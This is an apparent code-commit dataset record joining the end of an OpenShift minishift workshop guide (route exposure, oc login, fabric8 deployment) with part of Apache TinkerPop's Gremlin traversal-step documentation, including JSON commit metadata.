Routes\n\n_Routes_ are the last concept to understand before starting to use OpenShift. Services provide an internal IP.\nRoutes expose a service outside of OpenShift. A route allows you to associate a service with an externally-reachable\n host name.\n\nimage::openshift-entities.png[OpenShift Entities, 800]\n
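\nOnce a service exists, exposing it to the outside world and inspecting the resulting route takes two `oc` commands. For example (using, purely as an illustration, the name of the service deployed later in this lab):\n\n[source, bash]\n----\noc expose service currency-3rdparty-service\noc get routes\n----\n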
\n### Installing and Starting OpenShift\n\nWe are going to use _minishift_ (https:\/\/github.com\/minishift\/minishift) to run OpenShift locally on your machine.\n\nBefore starting minishift, you need to install a hypervisor. Check https:\/\/docs.openshift.org\/latest\/minishift\/getting-started\/installing.html \nto see which hypervisors are supported for your operating system. When in doubt, use VirtualBox (https:\/\/www.virtualbox.org\/wiki\/Downloads). \nBe sure to have a hypervisor before continuing.\n\nIf not already done, download the latest release from https:\/\/github.com\/minishift\/minishift\/releases (do not\nuse beta). Download the archive and copy the `minishift` executable in the directory of your choice. Add this\ndirectory to your system `$PATH`. \n\nThen, in a terminal, run:\n\n[source, bash]\n----\nminishift start\n----\n\nWhen the starting sequence completes, you should get the URL of the OpenShift Web Console such as: `https:\/\/192.168\n.64.12:8443`. Open this url in a browser and connect using the default `developer\/developer` credentials.\n\nNow we have OpenShift running, but we need a way to interact with it. The _OpenShift Client_ (`oc`) is a command line\n tool to interact with OpenShift. Fortunately, this client is shipped with minishift. Use `minishift oc-env` to display\n the command you need to type into your shell in order to add the oc binary to your PATH environment variable. Then,\n run the following `oc` command to connect to your OpenShift instance:\n\n[source, bash]\n----\noc login -u developer -p developer\n----\n\nTIP: for Unix style shells you can run `eval $(minishift oc-env)` to make `oc` available.\n\nNow, you are ready to deploy your first application.\n\n### Your first project and deployment\n\nWe are going to use a specific project to host all the microservices developed in this lab. A `project` is a\nnamespace that makes it easy to organize your different applications in OpenShift. In a terminal run:\n\n[source, bash]\n----\noc new-project vertx-kubernetes-workshop\noc policy add-role-to-user view admin -n vertx-kubernetes-workshop\noc policy add-role-to-user view -n vertx-kubernetes-workshop -z default\noc policy add-role-to-group view system:serviceaccounts -n vertx-kubernetes-workshop\n----\n\nThe first instruction creates the project. The last three instructions grant the permissions required to use all the\nOpenShift capabilities.\n\nIn the OpenShift Web Console, you should see the newly created project. Click on it. It's empty, so let's deploy our\nfirst application.\n\nIn the workshop source code, locate the `currency-3rdparty-service` and navigate to the directory in your terminal.\nNow issue the `mvn fabric8:deploy` command:\n\n[source, bash]\n----\ncd $WORKSHOP_ROOT\/currency-3rdparty-service\nmvn fabric8:deploy\n----\n\nThe `fabric8 maven plugin` is a Maven plugin facilitating the deployment of OpenShift applications. The `:deploy`\nmojo packages the application and triggers the S2I build described above.\n\nIn your browser, check the content of the project. You should see something like:\n\nimage::openshift-first-deployment.png[First deployment, 1024]\n\n\nClick on the route url and you should see `ok`. This indicates that your first application was successfully deployed.\n\n\n","old_contents":"## First step with Kubernetes\n\nFollowing a microservice approach will help you increasing your _agility_. 
However, it does not come for free and\nrequires a lot of discipline. It also stresses your deployment facilities. When the number of microservice grows, it\nbecomes very quickly an issue to maintain your system on track.\n\nTo help us with this, containers are a great packaging and runtime technology. Your application runs in an\n_isolated_ container, avoiding resource conflicts. But to deploy a set of containers and keep them coordinated, you\nneed a container platform. That's what Kubernetes is. Kubernetes defines a set of building blocks (\"primitives\") which\ncollectively provide mechanisms for deploying, maintaining, and scaling applications packaged inside containers. OpenShift\n _extends_ Kubernetes with build automation and routing system, but inherits from all these Kubernetes\nprimitives.\n\nimage::openshift-architecture.png[OpenShift Architecture, 800]\n\n### Primitives\n\n#### Pod\n\nThe basic scheduling unit in Kubernetes is called a _pod_. It adds a higher level of abstraction to containerized components.\nA pod consists of one or more containers that are guaranteed to be co-located on the host machine and can share resources.\nEach pod in Kubernetes is assigned a unique (within the cluster) IP address, which allows applications to use ports without\n the risk of conflict. A pod can define a _volume_, such as a local disk directory or a network disk, and expose it to\n the containers in the pod. Pods can be manually managed through the Kubernetes API, or their management can be\n delegated to a controller.\n\n#### Labels and Selectors\n\nKubernetes enables clients (users or internal components) to attach key-value pairs called _labels_ to any API object\n in the system, such as pods. Correspondingly, _label selectors_ are queries against labels that resolve to matching\n objects. Labels and selectors are the primary grouping mechanism in Kubernetes, and are used to determine the components\n to which an operation applies. Labels and selectors are used to group entities together.\n\n#### Replication Controller and Deployment\n\nControllers are entities managing other entities in order to keep them in a specific state. For instance, a\nreplication controller has the responsibility to keep alive _x_ replicas of a pod. When one of these replicas dies or\n becomes irresponsive, the controller kills it and restarts one. Likewise, if there are more replicas running than desired,\n it deletes as many as necessary to match the number.\n\nThe definition of a replication controller consists mainly of:\n\n1. The number of replicas desired (which can be adjusted at runtime).\n2. A pod definition for creating a replicated pod.\n3. A selector for identifying managed pods (using labels)\n\nBuilding on replication controllers, OpenShift expands support for the deployment lifecycle with the concept of _deployments_.\n In the simplest case, a deployment just creates a new replication controller and lets it start up pods. However, OpenShift\n deployments also provide the ability to transition from an existing deployment (_v1_ for instance) of an image to a new\n one (_v2_ for instance) and also define hooks to be run before or after creating the replication controller.\n\nOpenshift deployments proposes a set of strategy. One of them named _rolling_ implements a rolling updates and ensure\n that you don't disrupt your service. 
Before stopping the pod, it ensures that the new _version_ is alive and ready.\n Then it routes requests to this new pod and dispose the old one.\n\n#### Build and Image\n\nAs said in the previous section, `deployments` are responsible to keep the application running. But we need to\nprovide this application first. This application is pushed to OpenShift as an (container) _image_. This image is\ncreated by a _build_ and instantiated by the _deployment_.\n\nA build is the process of transforming your code into an image. The process is described in a `BuildConfig` object. Build\nobjects share common characteristics: inputs for a build (source code, artifacts), the need to complete a build process,\nlogging the build process, publishing resources from successful builds, and publishing the final status of the build.\n\nThere are different types of builds. You can create a `Docker` build taking a `Dockerfile` as parameter. The\nresulting image is generated by _building_ the `Dockerfile`. OpenShift also provides the concept of S2I (Source to\nImage) as a tool to provide reproducible image. In this lab, we are going to use S2I with binary content. We are\ngoing to build the application on our machine and push the resulting artifact (_fat jar_) as input of a S2I build.\nThis build creates an image starting the application.\n\nimage::openshift-build-process.png[OpenShift Build Process, 800]\n\n#### Services\n\nOk, so we know how our application is going to be _built_ and instantiated on OpenShift. But how are we going to use\nit? For this we need _services_. A _service_ identifies a set of pods (using labels) in order to proxy the connections\nit receives to them. Backing pods can be added to or removed from a service arbitrarily while the service remains\nconsistently available, enabling anything that depends on the service to refer to it at a consistent internal address.\n\nServices are assigned an IP address and port pair that, when accessed, proxy to an appropriate backing pod. A service\nuses a label selector to find all the containers running that provide a certain network service on a certain port.\n\nimage::openshift-service.png[OpenShift Services, 400]\n\n#### Routes\n\n_Routes_ are the last concept to understand before starting to use OpenShift. Services provides an internal IP.\nRoutes exposes a service outside of OpenShift. A route allows you to associate a service with an externally-reachable\n host name.\n\nimage::openshift-entities.png[OpenShift Entities, 800]\n\n### Installing and Starting OpenShift\n\nWe are going to use _minishift_ (https:\/\/github.com\/minishift\/minishift) to run OpenShift locally on your machine.\n\nBefore starting minishift, you need to install a hypervisor. Check the https:\/\/docs.openshift.org\/latest\/minishift\/getting-started\/installing.html to check what are the supported ones depending on your operating system. In case of doubt, use VirtualBox (https:\/\/www.virtualbox.org\/wiki\/Downloads). Be sure to have a hypervisor before continuing.\n\nIf not already done, download the latest releases from https:\/\/github.com\/minishift\/minishift\/releases (don't\nuse beta). Download the archive and copy the `minishift` executable in the directory of your choice. Add this\ndirectory to your system `$PATH`. \n\nThen, in a terminal, run:\n\n[source, bash]\n----\nminishift start\n----\n\nWhen the starting sequence completes, you should get the URL of the OpenShift Web Console such as: `https:\/\/192.168\n.64.12:8443`. 
Open this url in a browser and connect using the `developer\/developer` credentials.\n\nNow we have OpenShift running. But we need a way to interact with it. The _OpenShift Client_ (`oc`) is a command line\n tool to interact with OpenShift. Fortunately, this client is shipped with minishift. Use `minishift oc-env` to display\n the command you need to type into your shell in order to add the oc binary to your PATH environment variable. Then,\n run the following `oc` command to connect to your OpenShift instance:\n\n[source, bash]\n----\noc login -u developer -p developer\n----\n\nNow, you are ready to deploy your first application.\n\n### Your first project and deployment\n\nWe are going to use a specific project to host all the microservices developed in this lab. A `project` is a\nnamespace making easy to organize your different application in OpenShift. In a terminal run:\n\n[source, bash]\n----\noc new-project vertx-kubernetes-workshop\noc policy add-role-to-user view admin -n vertx-kubernetes-workshop\noc policy add-role-to-user view -n vertx-kubernetes-workshop -z default\noc policy add-role-to-group view system:serviceaccounts -n vertx-kubernetes-workshop\n----\n\nThe first instruction creates the project. The 3 last instructions grants permissions in order to use all the\nOpenShift capabilities.\n\nIn the OpenShift Web Console, you should see the newly created project. Click on it. It's empty, let's deploy our\nfirst application.\n\nIn the workshop source code, locate the `currency-3rdparty-service`, and navigate in the directory in your terminal.\nThen issue the `mvn fabric8:deploy` command:\n\n[source, bash]\n----\ncd $WORKSHOP_ROOT\/currency-3rdparty-service\nmvn fabric8:deploy\n----\n\nThe `fabric8 maven plugin` is a Maven Plugin facilitating the deployment of OpenShift applications. The `:deploy`\nmojo packages the application and triggers the S2I build are described above.\n\nIn your browser, check the content of the project. 
You should see something like:\n\nimage::openshift-first-deployment.png[First deployment, 1024]\n\n\nClick on the route url, you should see `ok`.\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d11ce9c0ca90f3dc060db402f65554acd5349af4","subject":"added discussion of vendor optimization strategy to docs.","message":"added discussion of vendor optimization strategy to docs.\n","repos":"rmagen\/incubator-tinkerpop,robertdale\/tinkerpop,samiunn\/incubator-tinkerpop,PommeVerte\/incubator-tinkerpop,jorgebay\/tinkerpop,artem-aliev\/tinkerpop,dalaro\/incubator-tinkerpop,robertdale\/tinkerpop,velo\/incubator-tinkerpop,krlohnes\/tinkerpop,rmagen\/incubator-tinkerpop,n-tran\/incubator-tinkerpop,rmagen\/incubator-tinkerpop,n-tran\/incubator-tinkerpop,apache\/tinkerpop,BrynCooke\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,dalaro\/incubator-tinkerpop,edgarRd\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,edgarRd\/incubator-tinkerpop,artem-aliev\/tinkerpop,mike-tr-adamson\/incubator-tinkerpop,gdelafosse\/incubator-tinkerpop,apache\/tinkerpop,PommeVerte\/incubator-tinkerpop,vtslab\/incubator-tinkerpop,dalaro\/incubator-tinkerpop,BrynCooke\/incubator-tinkerpop,apache\/incubator-tinkerpop,RussellSpitzer\/incubator-tinkerpop,newkek\/incubator-tinkerpop,RedSeal-co\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,robertdale\/tinkerpop,BrynCooke\/incubator-tinkerpop,RedSeal-co\/incubator-tinkerpop,edgarRd\/incubator-tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,vtslab\/incubator-tinkerpop,artem-aliev\/tinkerpop,pluradj\/incubator-tinkerpop,krlohnes\/tinkerpop,newkek\/incubator-tinkerpop,krlohnes\/tinkerpop,RussellSpitzer\/incubator-tinkerpop,jorgebay\/tinkerpop,artem-aliev\/tinkerpop,PommeVerte\/incubator-tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,jorgebay\/tinkerpop,RussellSpitzer\/incubator-tinkerpop,gdelafosse\/incubator-tinkerpop,krlohnes\/tinkerpop,gdelafosse\/incubator-tinkerpop,krlohnes\/tinkerpop,jorgebay\/tinkerpop,velo\/incubator-tinkerpop,artem-aliev\/tinkerpop,apache\/tinkerpop,pluradj\/incubator-tinkerpop,vtslab\/incubator-tinkerpop,apache\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,n-tran\/incubator-tinkerpop,newkek\/incubator-tinkerpop,velo\/incubator-tinkerpop,apache\/tinkerpop,apache\/incubator-tinkerpop,apache\/tinkerpop,RedSeal-co\/incubator-tinkerpop,samiunn\/incubator-tinkerpop","old_file":"docs\/src\/the-traversal.asciidoc","new_file":"docs\/src\/the-traversal.asciidoc","new_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n[[traversal]]\nThe Traversal\n=============\n\nimage::gremlin-running.png[width=125]\n\nAt the most general level there is `Traversal<S,E>` which implements `Iterator<E>`, where the `S` stands for start and the `E` stands for end. 
A traversal is composed of four primary components:\n \n . `Step<S,E>`: an individual function applied to `S` to yield `E`. Steps are chained within a traversal.\n . `TraversalStrategy`: interceptor methods to alter the execution of the traversal (e.g. query re-writing).\n . `TraversalSideEffects`: key\/value pairs that can be used to store global information about the traversal.\n . `Traverser<T>`: the object propagating through the `Traversal` currently representing an object of type `T`. \n\nThe classic notion of a graph traversal is provided by `GraphTraversal<S,E>` which extends `Traversal<S,E>`. GraphTraversal provides an interpretation of the graph data in terms of vertices, edges, etc. and is thus a graph traversal link:http:\/\/en.wikipedia.org\/wiki\/Domain-specific_language[DSL].\n\nIMPORTANT: The underlying `Step` implementations provided by TinkerPop should encompass most of the functionality required by a DSL author. It is important that DSL authors leverage the provided steps as then the common optimization and decoration strategies can reason on the underlying traversal sequence. If new steps are introduced, then common traversal strategies may not function properly.\n\n[[graph-traversal-steps]]\nGraph Traversal Steps\n---------------------\n\nimage::step-types.png[width=650]\n\nA `GraphTraversal<S,E>` can be spawned off of a Graph, Vertex, Edge, or VertexProperty. It can also be spawned anonymously (i.e. empty) via `__`. A graph traversal is composed of an ordered list of steps. All the steps provided by `GraphTraversal` inherit from the more general forms diagrammed above. A list of all the steps (and their descriptions) is provided in the TinkerPop3 link:http:\/\/www.tinkerpop.com\/javadocs\/x.y.z\/core\/org\/apache\/tinkerpop\/gremlin\/process\/graph\/GraphTraversal.html[GraphTraversal JavaDoc]. The following subsections will demonstrate the GraphTraversal steps using the <<gremlin-console,Gremlin Console>>.\n\nNOTE: To reduce the verbosity of the expression, it is good to `import static org.apache.tinkerpop.gremlin.process.traversal.dsl.graph.__.*`. This way, instead of doing `__.inE()` for an anonymous traversal, it is possible to simply write `inE()`.\n\n[[lambda-steps]]\nLambda Steps\n~~~~~~~~~~~~\n\nCAUTION: Lambda steps are presented for educational purposes as they represent the foundational constructs of the Gremlin language. 
In practice, lambda steps should be avoided and traversal verification strategies exist to disallow their use unless explicitly \"turned off.\" For more information on the problems with lambdas, please read <<a-note-on-lambdas,A Note on Lambdas>>.\n\nThere are five generic steps from which all other specific steps described later extend.\n\n[width=\"100%\",cols=\"10,12\",options=\"header\"]\n|=========================================================\n| Step| Description\n| `map(Function<Traverser<S>, E>)` | map the traverser to some object of type `E` for the next step to process.\n| `flatMap(Function<Traverser<S>, Iterator<E>>)` | map the traverser to an iterator of `E` objects that are streamed to the next step.\n| `filter(Predicate<Traverser<S>>)` | map the traverser to either true or false, where false will not pass the traverser to the next step.\n| `sideEffect(Consumer<Traverser<S>>)` | perform some operation on the traverser and pass it to the next step.\n| `branch(Function<Traverser<S>,M>)` | split the traverser to all the traversals indexed by the `M` token.\n|=========================================================\n\nThe `Traverser<S>` object provides access to:\n\n . The current traversed `S` object -- `Traverser.get()`.\n . The current path traversed by the traverser -- `Traverser.path()`.\n .. A helper shorthand to get a particular path-history object -- `Traverser.path(String) == Traverser.path().get(String)`.\n . The number of times the traverser has gone through the current loop -- `Traverser.loops()`.\n . The number of objects represented by this traverser -- `Traverser.bulk()`.\n . The local data structure associated with this traverser -- `Traverser.sack()`.\n . The side-effects associated with the traversal -- `Traverser.sideEffects()`.\n .. A helper shorthand to get a particular side-effect -- `Traverser.sideEffect(String) == Traverser.sideEffects().get(String)`.\n\nimage:map-lambda.png[width=150,float=right]\n[gremlin-groovy,modern]\n----\ng.V(1).out().values('name') <1>\ng.V(1).out().map {it.get().value('name')} <2>\n----\n\n<1> An outgoing traversal from vertex 1 to the name values of the adjacent vertices.\n<2> The same operation, but using a lambda to access the name property values.\n\nimage:filter-lambda.png[width=160,float=right]\n[gremlin-groovy,modern]\n----\ng.V().filter {it.get().label() == 'person'} <1>\ng.V().hasLabel('person') <2>\n----\n\n<1> A filter that only allows the vertex to pass if it has the person label.\n<2> The more specific `hasLabel()`-step is implemented as a `filter()` with the respective predicate.\n\n\nimage:side-effect-lambda.png[width=175,float=right]\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').sideEffect(System.out.&println) <1>\n----\n\n<1> Whatever enters `sideEffect()` is passed to the next step, but some intervening process can occur.\n\nimage:branch-lambda.png[width=180,float=right]\n[gremlin-groovy,modern]\n----\ng.V().branch(values('name')).\n option('marko', values('age')).\n option(none, values('name')) <1>\ng.V().choose(has('name','marko'),\n values('age'),\n values('name')) <2>\n----\n\n<1> If the vertex is \"marko\", get his age, else get the name of the vertex.\n<2> The more specific boolean-based `choose()`-step is implemented as a `branch()`.\n
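\nSince a lambda receives the full `Traverser` rather than just the underlying object, the metadata listed earlier -- path, loops, bulk, etc. -- can be inspected from within it as well. A small illustration:\n\n[gremlin-groovy,modern]\n----\ng.V().both().both().map {it.bulk()} <1>\ng.V(1).out().sideEffect {println it.path()} <2>\n----\n\n<1> Expose how many equivalent objects each traverser currently represents.\n<2> Print the path history of each traverser as it passes through.\n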
\n[[addedge-step]]\nAddEdge Step\n~~~~~~~~~~~~\n\nIt is possible to mutate the graph within a traversal. The typical mutations are adding\/removing vertices, edges, and properties. To add edges, there is a collection of `addE()`-steps (*map*\/*sideEffect*).\n\n[gremlin-groovy,modern]\n----\ng.V(1).addOutE('co-worker',g.V(2),'year',2009) <1>\ng.V(4).addInE('createdBy',g.V(3,5)) <2>\ng.V(1).addOutE('livesNear',g.V(2),'year',2009).inV().inE('livesNear').values('year') <3>\ng.V(1).out('livesNear')\n----\n\n<1> Add an outgoing co-worker edge from the marko-vertex to the vadas-vertex with a year property of value 2009.\n<2> Add incoming createdBy edges from the josh-vertex to the lop- and ripple-vertices.\n<3> The newly created edge is a traversable object.\n\nimage::addedge-step.png[width=450]\n\nlink:http:\/\/en.wikipedia.org\/wiki\/Automated_reasoning[Reasoning] is the process of making explicit what is implicit in the data. What is explicit in a graph are the objects of the graph -- i.e. vertices and edges. What is implicit in the graph is the traversal. In other words, traversals expose meaning where the meaning is defined by the traversal description. For example, take the concept of a \"co-developer.\" Two people are co-developers if they have worked on the same project together. This concept can be represented as a traversal and thus, the concept of \"co-developers\" can be derived.\n\n[gremlin-groovy,modern]\n----\ng.V(1).as('a').out('created')\ng.V(1).as('a').out('created').in('created')\ng.V(1).as('a').out('created').in('created').where(neq('a')) <1>\ng.V(1).as('a').out('created').in('created').where(neq('a')).\n addOutE('co-developer','a').outV().\n addInE('co-developer','a')\ng.V(1).out('co-developer').values('name')\ng.V(1).in('co-developer').values('name')\n----\n\n<1> Marko can't be a co-developer with himself.\n\n[[addvertex-step]]\nAddVertex Step\n~~~~~~~~~~~~~~\n\nThe `addV()`-step is used to add vertices to the graph (*map*\/*sideEffect*). For every incoming object, a vertex is created. Moreover, `GraphTraversalSource` maintains an `addV()` method.\n\n[gremlin-groovy,modern]\n----\ng.addV(label,'person','name','stephen')\ng.V().values('name')\ng.V().outE('knows').addV('name','nothing')\ng.V().has('name','nothing')\ng.V().has('name','nothing').bothE()\n----\n\n[[addproperty-step]]\nAddProperty Step\n~~~~~~~~~~~~~~~~\n\nThe `property()`-step is used to add properties to the elements of the graph (*sideEffect*). Unlike `addV()` and `addE()`, `property()` is a full sideEffect step in that it does not return the property it created, but the element that streamed into it.\n\n[gremlin-groovy,modern]\n----\ng.V(1).property('country','usa')\ng.V(1).property('city','santa fe').property('state','new mexico').valueMap()\ng.V(1).property(list,'age',35)\ng.V(1).valueMap()\n----\n\n[[aggregate-step]]\nAggregate Step\n~~~~~~~~~~~~~~\n\nimage::aggregate-step.png[width=800]\n\nThe `aggregate()`-step (*sideEffect*) is used to aggregate all the objects at a particular point of traversal into a Collection. The step uses link:http:\/\/en.wikipedia.org\/wiki\/Eager_evaluation[eager evaluation] in that no objects continue on until all previous objects have been fully aggregated (as opposed to <<store-step,`store()`>> which link:http:\/\/en.wikipedia.org\/wiki\/Lazy_evaluation[lazily] fills a collection). The eager evaluation nature is crucial in situations where everything at a particular point is required for future computation. 
An example is provided below.\n\n[gremlin-groovy,modern]\n----\ng.V(1).out('created') <1>\ng.V(1).out('created').aggregate('x') <2>\ng.V(1).out('created').aggregate('x').in('created') <3>\ng.V(1).out('created').aggregate('x').in('created').out('created') <4>\ng.V(1).out('created').aggregate('x').in('created').out('created').\n where(without('x')).values('name') <5>\n----\n\n<1> What has marko created?\n<2> Aggregate all his creations.\n<3> Who are marko's collaborators?\n<4> What have marko's collaborators created?\n<5> What have marko's collaborators created that he hasn't created?\n\nIn link:http:\/\/en.wikipedia.org\/wiki\/Recommender_system[recommendation systems], the above pattern is used:\n\t\n\t\"What has userA liked? Who else has liked those things? What have they liked that userA hasn't already liked?\"\n\nFinally, `aggregate()`-step can be modulated via `by()`-projection.\n\n[gremlin-groovy,modern]\n----\ng.V().out('knows').aggregate()\ng.V().out('knows').aggregate().by('name')\n----\n\n[[and-step]]\nAnd Step\n~~~~~~~~\n\nThe `and()`-step ensures that all provided traversals yield a result (*filter*). Please see <<or-step,`or()`>> for or-semantics.\n\n[gremlin-groovy,modern]\n----\ng.V().and(\n outE('knows'),\n values('age').is(lt(30))).\n values('name')\n----\n\nThe `and()`-step can take an arbitrary number of traversals. All traversals must produce at least one output for the original traverser to pass to the next step.\n\nAn link:http:\/\/en.wikipedia.org\/wiki\/Infix_notation[infix notation] can be used as well. Though, with infix notation, only two traversals can be and'd together.\n\n[gremlin-groovy,modern]\n----\ng.V().has(outE('created').and().outE('knows')).values('name')\n----\n\n[[as-step]]\nAs Step\n~~~~~~~\n\nThe `as()`-step is not a real step, but a \"step modulator\" similar to <<by-step,`by()`>> and <<option-step,`option()`>>. With `as()`, it is possible to provide a label to the step that can later be accessed by steps and data structures that make use of such labels -- e.g., <<select-step,`select()`>>, <<match-step,`match()`>>, and path.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out('created').as('b').select() <1>\ng.V().as('a').out('created').as('b').select().by('name') <2>\n----\n\n<1> Select the objects labeled \"a\" and \"b\" from the path.\n<2> Select the objects labeled \"a\" and \"b\" from the path and, for each object, project its name value.\n\nA step can have any number of labels associated with it. This is useful for referencing the same step multiple times in a future step.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('software').as('a','b','c').\n select().\n by('name').\n by('lang').\n by(__.in('created').values('name').fold())\n----\n\n[[by-step]]\nBy Step\n~~~~~~~\n\nThe `by()`-step is not an actual step, but instead is a \"step-modulator\" similar to <<as-step,`as()`>> and <<option-step,`option()`>>. If a step is able to accept traversals, functions, comparators, etc. then `by()` is the means by which they are added. The general pattern is `step().by()...by()`. 
Some steps can only accept one `by()` while others can take an arbitrary amount.\n\n[gremlin-groovy,modern]\n----\ng.V().group().by(bothE().count()) <1>\ng.V().group().by(bothE().count()).by('name') <2>\ng.V().group().by(bothE().count()).by('name').by(count(local)) <3>\n----\n\n<1> `by(bothE().count())` will group the elements by their edge count (*traversal*).\n<2> `by('name')` will process the grouped elements by their name (*element property projection*).\n<3> `by(count(local))` will count the number of elements in each group (*traversal*).\n\n[[coalesce-step]]\nCoalesce Step\n~~~~~~~~~~~~~\n\nThe `coalesce()`-step evaluates the provided traversals in order and returns the first traversal that emits at least one element.\n\n[gremlin-groovy,modern]\n----\ng.V(1).coalesce(outE('knows'), outE('created')).inV().path().by('name').by(label)\ng.V(1).coalesce(outE('created'), outE('knows')).inV().path().by('name').by(label)\ng.V(1).next().property('nickname', 'okram')\ng.V().hasLabel('person').coalesce(values('nickname'), values('name'))\n----\n\n[[count-step]]\nCount Step\n~~~~~~~~~~\n\nimage::count-step.png[width=195]\n\nThe `count()`-step (*map*) counts the total number of represented traversers in the streams (i.e. the bulk count).\n\n[gremlin-groovy,modern]\n----\ng.V().count()\ng.V().hasLabel('person').count()\ng.V().hasLabel('person').outE('created').count().path() <1>\ng.V().hasLabel('person').outE('created').count().map {it.get() * 10}.path() <2>\n----\n\n<1> `count()`-step is a <<a-note-on-barrier-steps,reducing barrier step>> meaning that all of the previous traversers are folded into a new traverser.\n<2> The path of the traverser emanating from `count()` starts at `count()`.\n\nIMPORTANT: `count(local)` counts the current, local object (not the objects in the traversal stream). This works for `Collection`- and `Map`-type objects. For any other object, a count of 1 is returned.\n
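\nTo make the `local` scope concrete, the following counts within the current object rather than over the stream (a small illustration):\n\n[gremlin-groovy,modern]\n----\ng.V(1).valueMap().count(local) <1>\ng.V().out().fold().count(local) <2>\n----\n\n<1> The marko-vertex has two properties and thus, its value map locally counts to 2.\n<2> The folded list is a single object whose entries are counted locally.\n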
\n[[choose-step]]\nChoose Step\n~~~~~~~~~~~\n\nimage::choose-step.png[width=700]\n\nThe `choose()`-step (*branch*) routes the current traverser to a particular traversal branch option. With `choose()`, it is possible to implement if\/else-based semantics as well as more complicated selections.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').\n choose(values('age').is(lte(30)),\n __.in(),\n __.out()).values('name') <1>\ng.V().hasLabel('person').\n choose(values('age')).\n option(27, __.in()).\n option(32, __.out()).values('name') <2>\n----\n\n<1> If the traversal yields an element, then do `in`, else do `out` (i.e. true\/false-based option selection).\n<2> Use the result of the traversal as a key to the map of traversal options (i.e. value-based option selection).\n\nHowever, note that `choose()` can have an arbitrary number of options and moreover, can take an anonymous traversal as its choice function.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').\n choose(values('name')).\n option('marko', values('age')).\n option('josh', values('name')).\n option('vadas', valueMap()).\n option('peter', label())\n----\n\nThe `choose()`-step can leverage the `Pick.none` option match. For anything that does not match a specified option, the `none`-option is taken.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').\n choose(values('name')).\n option('marko', values('age')).\n option(none, values('name'))\n----\n\n[[coin-step]]\nCoin Step\n~~~~~~~~~\n\nTo randomly filter out a traverser, use the `coin()`-step (*filter*). The provided double argument biases the \"coin toss.\"\n\n[gremlin-groovy,modern]\n----\ng.V().coin(0.5)\ng.V().coin(0.0)\ng.V().coin(1.0)\n----\n\n[[cyclicpath-step]]\nCyclicPath Step\n~~~~~~~~~~~~~~~\n\nimage::cyclicpath-step.png[width=400]\n\nEach traverser maintains its history through the traversal over the graph -- i.e. its <<path-data-structure,path>>. If it is important that the traverser repeat its course, then `cyclicPath()`-step should be used (*filter*). The step analyzes the path of the traverser thus far and if there are any repeats, the traverser is filtered out over the traversal computation. If non-cyclic behavior is desired, see <<simplepath-step,`simplePath()`>>.\n\n[gremlin-groovy,modern]\n----\ng.V(1).both().both()\ng.V(1).both().both().cyclicPath()\ng.V(1).both().both().cyclicPath().path()\n----\n
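\nFor contrast, the complementary <<simplepath-step,`simplePath()`>>-step keeps only those traversers whose path contains no repeats (shown here purely for illustration):\n\n[gremlin-groovy,modern]\n----\ng.V(1).both().both().simplePath().path()\n----\n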
\n[[dedup-step]]\nDedup Step\n~~~~~~~~~~\n\nWith `dedup()`-step (*filter*), repeatedly seen objects are removed from the traversal stream. Note that if a traverser's bulk is greater than 1, then it is set to 1 before being emitted.\n\n[gremlin-groovy,modern]\n----\ng.V().values('lang')\ng.V().values('lang').dedup()\ng.V(1).repeat(bothE('created').dedup().otherV()).emit().path() <1>\n----\n\n<1> Traverse all `created` edges, but don't touch any edge twice.\n\nIf a by-step modulation is provided to `dedup()`, then the object is processed accordingly prior to determining if it has been seen or not.\n\n[gremlin-groovy,modern]\n----\ng.V().valueMap(true, 'name')\ng.V().dedup().by(label).values('name')\n----\n\nWARNING: The `dedup()`-step does not have a correlate in <<traversalvertexprogram,Gremlin OLAP>> when used mid-traversal. When in mid-traversal, de-duplication only occurs at the current processing vertex and thus, is not a global operation as it is in Gremlin OLTP. When `dedup()` is an end step, the resultant traversers are de-duplicated by `TraverserMapReduce`.\n\n[[drop-step]]\nDrop Step\n~~~~~~~~~\n\nThe `drop()`-step (*filter*\/*sideEffect*) is used to remove elements and properties from the graph (i.e. remove). It is a filter step because the traversal yields no outgoing objects.\n\n[gremlin-groovy,modern]\n----\ng.V().outE().drop()\ng.E()\ng.V().properties('name').drop()\ng.V().valueMap()\ng.V().drop()\ng.V()\n----\n\n[[fold-step]]\nFold Step\n~~~~~~~~~\n\nThere are situations when the traversal stream needs a \"barrier\" to aggregate all the objects and emit a computation that is a function of the aggregate. The `fold()`-step (*map*) is one particular instance of this. Please see <<unfold-step,`unfold()`>>-step for the inverse functionality.\n\n[gremlin-groovy,modern]\n----\ng.V(1).out('knows').values('name')\ng.V(1).out('knows').values('name').fold() <1>\ng.V(1).out('knows').values('name').fold().next().getClass() <2>\ng.V(1).out('knows').values('name').fold(0) {a,b -> a + b.length()} <3>\ng.V().values('age').fold(0) {a,b -> a + b} <4>\ng.V().values('age').fold(0, sum) <5>\ng.V().values('age').sum() <6>\n----\n\n<1> A parameterless `fold()` will aggregate all the objects into a list and then emit the list.\n<2> A verification of the type of list returned.\n<3> `fold()` can be provided two arguments -- a seed value and a reduce bi-function (\"vadas\" is 5 characters + \"josh\" with 4 characters).\n<4> What is the total age of the people in the graph?\n<5> The same as before, but using a built-in bi-function.\n<6> The same as before, but using the <<sum-step,`sum()`-step>>.\n\n[[group-step]]\nGroup Step\n~~~~~~~~~~\n\nAs traversers propagate across a graph as defined by 